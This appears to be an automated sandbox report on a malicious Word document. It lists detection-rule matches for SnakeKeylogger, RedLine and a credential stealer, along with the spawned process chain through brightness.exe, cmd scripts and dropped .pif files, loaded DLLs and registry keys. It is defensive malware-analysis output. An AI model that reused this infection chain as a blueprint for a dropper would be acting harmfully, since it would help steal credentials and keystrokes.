Source: 16.2.npratlsN.pif.2ea90000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.npratlsN.pif.2e490000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 16.2.npratlsN.pif.2bb8a8ee.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.npratlsN.pif.2e490000.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.npratlsN.pif.2ea90000.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.npratlsN.pif.2e490000.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 16.2.npratlsN.pif.2ea90000.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.3.npratlsN.pif.29aec7e8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.3.npratlsN.pif.29aec7e8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.3.npratlsN.pif.29aec7e8.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 14.2.npratlsN.pif.214fa8ee.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.2.npratlsN.pif.214fa8ee.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.npratlsN.pif.214fa8ee.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000A.00000001.1859265751.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000E.00000002.3432289694.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000E.00000002.3465867271.00000000242F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000E.00000002.3465867271.00000000242F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000E.00000002.3465867271.00000000242F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000A.00000002.3472158712.000000002DD40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000A.00000002.3472158712.000000002DD40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000002.3472158712.000000002DD40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000010.00000002.3464658722.000000002E310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000010.00000002.3464658722.000000002E310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000010.00000002.3464658722.000000002E310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000E.00000003.1988530377.000000001F96E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000A.00000002.3462362371.000000002B449000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000010.00000002.3456650715.000000002BB49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000010.00000002.3432404801.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000A.00000002.3473586471.000000002E490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000A.00000002.3473586471.000000002E490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000002.3473586471.000000002E490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000E.00000002.3465440531.0000000023CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000E.00000002.3465440531.0000000023CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000E.00000002.3465440531.0000000023CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000A.00000002.3432275183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000A.00000003.1862021151.0000000029AEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000010.00000003.2059147464.0000000029E87000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000E.00000002.3456832626.00000000214B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000E.00000001.1974371913.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000010.00000001.2054825787.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000010.00000002.3465905610.000000002EA90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000010.00000002.3465905610.000000002EA90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000010.00000002.3465905610.000000002EA90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: Process Memory Space: npratlsN.pif PID: 4544, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: npratlsN.pif PID: 3592, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: npratlsN.pif PID: 6036, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winDOC@20/13@5/6

Source: C:\Windows\SysWOW64\brightness.exe

Code function: 4_2_028F7FD4 GetDiskFreeSpaceA,

4_2_028F7FD4

Source: C:\Users\Public\Libraries\npratlsN.pif

Code function: 10_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

10_2_004019F0

Source: C:\Windows\SysWOW64\brightness.exe

Code function: 4_2_02906DC8 CoCreateInstance,

4_2_02906DC8

Source: C:\Users\Public\Libraries\npratlsN.pif

10_2_004019F0

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Users\user\Desktop\~$ ITS15235.doc

Jump to behavior

Source: C:\Users\Public\Libraries\npratlsN.pif	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6036:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7404:120:WilError_03

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\{F98CC917-2825-4E92-B64F-05CCC8726088} - OProcSessId.dat

Jump to behavior

Source: PI ITS15235.doc

OLE indicator, Word Document stream: true

Source: PI ITS15235.doc	OLE document summary: title field not present or empty
Source: PI ITS15235.doc	OLE document summary: edited time not present or 0

Source: C:\Users\Public\Libraries\npratlsN.pif	Command line argument: 08A	10_2_00413780
Source: C:\Users\Public\Libraries\npratlsN.pif	Command line argument: 08A	14_2_00413780
Source: C:\Users\Public\Libraries\npratlsN.pif	Command line argument: 08A	14_2_00413780
Source: C:\Users\Public\Libraries\npratlsN.pif	Command line argument: 08A	14_1_00413780

Source: C:\Windows\SysWOW64\brightness.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\brightness.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: PI ITS15235.doc	Virustotal: Detection: 59%
Source: PI ITS15235.doc	ReversingLabs: Detection: 57%

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\brightness.exe C:\Windows\SysWOW64\brightness.exe
Source: C:\Windows\SysWOW64\brightness.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\NsltarpnF.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\brightness.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\brightness.exe	Process created: C:\Users\Public\Libraries\npratlsN.pif C:\Users\Public\Libraries\npratlsN.pif
Source: unknown	Process created: C:\Users\Public\Libraries\Nsltarpn.PIF "C:\Users\Public\Libraries\Nsltarpn.PIF"
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Process created: C:\Users\Public\Libraries\npratlsN.pif C:\Users\Public\Libraries\npratlsN.pif
Source: unknown	Process created: C:\Users\Public\Libraries\Nsltarpn.PIF "C:\Users\Public\Libraries\Nsltarpn.PIF"
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Process created: C:\Users\Public\Libraries\npratlsN.pif C:\Users\Public\Libraries\npratlsN.pif
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\brightness.exe C:\Windows\SysWOW64\brightness.exe	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\NsltarpnF.cmd" "	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Process created: C:\Users\Public\Libraries\npratlsN.pif C:\Users\Public\Libraries\npratlsN.pif	Jump to behavior
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Process created: C:\Users\Public\Libraries\npratlsN.pif C:\Users\Public\Libraries\npratlsN.pif
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Process created: C:\Users\Public\Libraries\npratlsN.pif C:\Users\Public\Libraries\npratlsN.pif

Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: url.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: winhttpcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
